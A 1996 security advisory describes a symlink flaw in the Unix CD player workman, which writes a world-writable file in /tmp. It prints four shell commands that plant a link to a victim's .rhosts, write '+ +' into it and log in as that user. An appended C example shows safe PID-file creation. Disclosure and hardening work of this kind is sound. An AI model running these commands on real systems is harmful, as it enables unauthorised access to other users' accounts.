r00t advisory                [ workman ]                [ Aug 25 1996 ]

-- Synopsis

There exists a vulnerability in workman that will allow any user to create
and write to files owned by the user who is running workman. Workman creates
a mode 666 file in /tmp and will gladly follow a symbolic link to its target.

-- Exploitability

The exploit is absurdly simple:

    $ ln -s /home/target_user/.rhosts /tmp/.wm_pid
    # wait for target user to run workman
    $ echo "+ +" >/home/target_user/.rhosts
    $ rlogin -l localhost target_user

-- Fixes ?

The author of workman has been alerted to this problem and a patch is
available from ggal () ccs neu edu.

r00t -- http://www.r00t.org
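For the defender's side of the advisory above, this added example (not workman's code and not the author's patch, which is not reproduced on this page) shows one way to create a PID file so that a symlink planted at the path is refused and the file is owner-only instead of mode 666. The names write_pid_file and demo_symlink_refused and the scratch directory are assumptions made for the illustration.

```c
#ifndef _GNU_SOURCE
#define _GNU_SOURCE /* for O_NOFOLLOW, mkdtemp, symlink under strict modes */
#endif
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

/* Returns 0 on success, -1 (errno set) if the path exists or is unsafe. */
int write_pid_file(const char *path)
{
    /* O_CREAT|O_EXCL fails if anything, even a dangling symlink, already
     * sits at the path; O_NOFOLLOW is a second guard. 0600: owner only. */
    int fd = open(path, O_WRONLY | O_CREAT | O_EXCL | O_NOFOLLOW, 0600);
    if (fd < 0)
        return -1;
    struct stat st;
    char buf[32];
    int n = snprintf(buf, sizeof buf, "%ld\n", (long)getpid());
    if (fstat(fd, &st) != 0 || !S_ISREG(st.st_mode) || st.st_uid != geteuid()
        || fchmod(fd, 0600) != 0 || write(fd, buf, (size_t)n) != n) {
        close(fd);
        unlink(path);
        return -1;
    }
    return close(fd);
}

/* Constructed check in a private scratch directory: a symlink is placed at
 * the PID path. Returns 1 if creation is refused, the link target is never
 * created, and a fresh path ends up mode 0600. */
int demo_symlink_refused(void)
{
    char dir[] = "/tmp/pidfile-demo-XXXXXX", target[64], pid[64], ok[64];
    struct stat st;
    if (!mkdtemp(dir)) return 0;
    snprintf(target, sizeof target, "%s/victim", dir);
    snprintf(pid, sizeof pid, "%s/.wm_pid", dir);
    snprintf(ok, sizeof ok, "%s/fresh_pid", dir);
    if (symlink(target, pid) != 0) return 0;
    int refused = write_pid_file(pid) == -1
                  && (errno == EEXIST || errno == ELOOP)
                  && stat(target, &st) == -1;
    int created = write_pid_file(ok) == 0 && stat(ok, &st) == 0
                  && (st.st_mode & 0777) == 0600;
    unlink(pid); unlink(ok); rmdir(dir);
    return refused && created;
}
```

Keeping such files in a per-user directory rather than a fixed name in /tmp removes the shared, predictable path altogether.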